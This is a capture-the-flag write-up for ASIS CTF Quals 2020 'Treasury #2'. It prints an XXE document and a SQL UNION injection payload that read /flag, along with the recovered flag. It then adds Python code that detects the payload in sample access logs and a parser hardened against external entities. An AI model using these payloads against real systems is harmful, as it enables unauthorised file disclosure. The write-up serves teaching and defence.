Tags: sqli web xxe

## Treasury #2
Before going forward, make sure to read the solution of Treasury #1 since this part is pretty easy and just uses what we gathered in the first part.

### XXE
That being said, it is now obvious that we need to read the contents of /flag.
> If only I could read files :(

Oh yes we can... XML provides us with the great feature of loading external resources through Document Type Definitions (DTDs), and abusing it is what **XXE attacks** (XML eXternal Entity) are about.

Here is the XML we'll be injecting to read the contents of /flag (the DOCTYPE and ENTITY declarations were lost in this copy and are restored here from the explanation below):
```xml
<!DOCTYPE root [
<!ENTITY flag SYSTEM "file:///flag">
]>
<root>
<excerpt>&flag;</excerpt>
</root>
```

As you can see, we use a DOCTYPE definition and declare `flag` as an external entity that reads the /flag file, so when we reference `&flag;` inside the excerpt tag, the parser replaces the flag "variable" with the contents of /flag. Let's see:
- **Query payload:** `' UNION SELECT '<!DOCTYPE root [<!ENTITY flag SYSTEM "file:///flag">]><root><excerpt>&flag;</excerpt></root>` (the DTD part is restored here for the same reason as above)
- **Explanation:** nothing much to explain, we just inject the XML in the UNION query
- **Response:** ASIS{03482b1821398ccb5214d891aed35dc87d3a77b2}, we get the second **flag** as expected, **very COOL**.
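As an added defensive companion to this writeup (not code from the original writeup or the challenge), here is a Python pass that spots this exact payload once it has been percent-decoded out of query parameters in constructed access-log lines, next to a hardened excerpt parser that refuses any DOCTYPE and never resolves external entities. The log format, the /excerpt path and the `id` parameter are assumptions.

```python
import re
import urllib.parse
import xml.parsers.expat

# The injected document from the writeup and the UNION payload that carries it.
XXE_DOC = b'<!DOCTYPE root [<!ENTITY flag SYSTEM "file:///flag">]><root><excerpt>&flag;</excerpt></root>'
PAYLOAD = "' UNION SELECT '" + XXE_DOC.decode()

# Constructed access-log lines (not from the writeup); the second one carries the
# payload percent-encoded in a hypothetical "id" query parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2020:10:00:01 +0000] "GET /excerpt?id=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jul/2020:10:00:07 +0000] "GET /excerpt?id='
    + urllib.parse.quote(PAYLOAD, safe="") + ' HTTP/1.1" 200 87',
]

DTD_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b|\bSYSTEM\s*[\"']", re.I)

def flag_xxe_requests(log_lines):
    """Return (line_no, param) for each percent-decoded query parameter carrying DTD markup."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        query = urllib.parse.urlsplit(m.group(1) if m else "").query
        for key, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
            if DTD_MARKER.search(value):  # parse_qsl already decoded %3C%21DOCTYPE etc.
                hits.append((no, key))
    return hits

def parse_excerpt(xml_bytes):
    """Hardened read of <root><excerpt>..</excerpt></root>: a DOCTYPE aborts the parse."""
    parser = xml.parsers.expat.ParserCreate()
    text, inside = [], [False]
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DTD rejected in document: " + name)
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = lambda *args: 0  # 0 = never resolve external entities
    parser.StartElementHandler = lambda name, attrs: inside.__setitem__(0, name == "excerpt")
    parser.EndElementHandler = lambda name: inside.__setitem__(0, False)
    parser.CharacterDataHandler = lambda data: text.append(data) if inside[0] else None
    parser.Parse(xml_bytes, True)
    return "".join(text)

def rejects_dtd(xml_bytes):
    # True when parse_excerpt refuses the document because it declares a DTD.
    try:
        parse_excerpt(xml_bytes)
        return False
    except ValueError:
        return True
```

The two halves are independent: the log check catches the injection after the fact, while the parser change is what stops the file read in the first place.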

Original writeup (https://github.com/malikDaCoda/CTFs-writeups/tree/master/web/ASIS%20CTF%20Quals%202020-Treasury).